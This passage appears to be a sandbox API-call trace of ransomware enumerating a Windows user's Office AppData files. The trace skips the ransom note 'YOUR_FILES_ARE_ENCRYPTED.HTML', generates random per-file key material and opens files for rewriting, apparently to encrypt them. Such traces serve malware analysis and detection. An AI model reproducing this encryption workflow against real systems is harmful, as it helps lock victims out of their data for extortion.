ftLastAccessTime.dwLowDateTime=0x34fad830, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x34fad830, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x4050, dwReserved0=0x0, dwReserved1=0x60, cFileName="officec2rclient.exe_Rules.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0159.496] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml") returned 89 [0159.496] lstrcmpW (lpString1="officec2rclient.exe_Rules.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.496] PathFindExtensionW (pszPath="officec2rclient.exe_Rules.xml") returned=".xml" [0159.496] lstrlenW (lpString=".xml") returned 4 [0159.496] PathFindExtensionW (pszPath="officec2rclient.exe_Rules.xml") returned=".xml" [0159.496] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\officec2rclient.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.498] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=16464) returned 1 [0159.501] GetProcessHeap () returned 0x270000 [0159.506] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.509] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="B5") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="62") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="F9") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd11e, 
param_2="%02X" | out: param_1="56") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="15") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="2C") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="E8") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="58") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="C9") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="41") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="E9") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="5C") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="CD") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="23") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="71") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="6D") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="E2") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="7D") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="69") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="0F") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="68") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="22") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="68") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="A7") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CE") returned 2 [0159.509] wsprintfW 
(in: param_1=0x4ebd176, param_2="%02X" | out: param_1="DA") returned 2 [0159.509] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="95") returned 2 [0159.510] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="FD") returned 2 [0159.510] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="DF") returned 2 [0159.510] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="97") returned 2 [0159.510] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="1F") returned 2 [0159.510] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="0C") returned 2 [0159.510] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml" [0159.510] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.510] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.523] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a341890, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6a341890, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6a341890, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x14a97, dwReserved0=0x0, dwReserved1=0x60, cFileName="outlook.exe_Rules.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0159.523] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml") returned 81 [0159.524] lstrcmpW (lpString1="outlook.exe_Rules.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.524] PathFindExtensionW (pszPath="outlook.exe_Rules.xml") returned=".xml" [0159.524] lstrlenW (lpString=".xml") returned 4 [0159.524] PathFindExtensionW (pszPath="outlook.exe_Rules.xml") returned=".xml" [0159.524] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\outlook.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.524] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=84631) returned 1 [0159.524] GetProcessHeap () returned 0x270000 [0159.524] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.525] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="2C") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="FC") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="DC") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="1C") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="71") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="24") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="2A") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="AE") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd132, 
param_2="%02X" | out: param_1="37") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="6E") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="3C") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="0A") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="08") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="C3") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="11") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="AD") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="B3") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="96") returned 2 [0159.525] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="5C") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="B7") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="40") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="8D") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="7A") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="6F") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CD") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="7B") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="30") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="EE") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="74") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="ED") returned 2 [0159.526] wsprintfW 
(in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="A4") returned 2 [0159.526] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="7F") returned 2 [0159.526] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml" [0159.526] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.526] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.528] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3a82bc0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xe3a82bc0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xe3a82bc0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12c44, dwReserved0=0x0, dwReserved1=0x60, cFileName="powerpnt.exe_Rules.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0159.528] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml") returned 82 [0159.528] lstrcmpW (lpString1="powerpnt.exe_Rules.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.528] PathFindExtensionW (pszPath="powerpnt.exe_Rules.xml") returned=".xml" [0159.528] lstrlenW (lpString=".xml") returned 4 [0159.529] PathFindExtensionW (pszPath="powerpnt.exe_Rules.xml") returned=".xml" [0159.529] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: 
RandomBuffer=0x4ebd1d4) returned 1 [0159.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\powerpnt.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.542] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=76868) returned 1 [0159.542] GetProcessHeap () returned 0x270000 [0159.542] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.542] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="FC") returned 2 [0159.542] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="E8") returned 2 [0159.542] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="DE") returned 2 [0159.542] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="78") returned 2 [0159.542] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="5B") returned 2 [0159.542] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="81") returned 2 [0159.542] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="FF") returned 2 [0159.542] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="77") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="D7") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="E4") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="C4") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="24") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="C4") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="94") returned 2 [0159.543] wsprintfW (in: 
param_1=0x4ebd14a, param_2="%02X" | out: param_1="F4") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="B9") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="07") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="33") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="85") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="0F") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="61") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="FC") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="AD") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="92") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="A6") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="2B") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="64") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="F1") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="F6") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="B7") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="90") returned 2 [0159.543] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="7A") returned 2 [0159.544] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml" [0159.544] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.544] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.544] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WebServiceCache", cAlternateFileName="WEBSER~1")) returned 1 [0159.545] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache") returned 75 [0159.545] GetProcessHeap () returned 0x270000 [0159.545] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0159.545] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache" [0159.546] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\*" [0159.546] 
FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1e12a7c, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0159.546] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1e12a7c, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.546] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1e12a7c, dwReserved1=0x0, cFileName="AllUsers", cAlternateFileName="")) returned 1 [0159.546] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers") returned 84 [0159.546] GetProcessHeap () returned 0x270000 [0159.546] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7422068 [0159.551] lstrcpyW (in: 
lpString1=0x7422068, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers" [0159.558] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\*" [0159.560] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0159.561] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.561] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x69b12cf0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69b12cf0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="officeclient.microsoft.com", cAlternateFileName="OFFICE~1.COM")) returned 1 [0159.561] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com") returned 111 [0159.561] GetProcessHeap () returned 0x270000 [0159.561] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0159.561] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com" [0159.561] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\*" [0159.561] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\officeclient.microsoft.com\\*", lpFindFileData=0x4ebc90c | out: lpFindFileData=0x4ebc90c*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x69b12cf0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69b12cf0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3300 [0159.563] FindNextFileW (in: hFindFile=0x42f3300, lpFindFileData=0x4ebc90c | out: lpFindFileData=0x4ebc90c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x69b12cf0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69b12cf0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.563] FindNextFileW (in: hFindFile=0x42f3300, lpFindFileData=0x4ebc90c | out: lpFindFileData=0x4ebc90c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x33b4bbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x33b4bbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x33b4bbd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x2071b, dwReserved0=0x0, dwReserved1=0x60, cFileName="54544101-5BBD-4F41-A10F-924E31A9B483", cAlternateFileName="545441~1")) returned 1 [0159.563] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 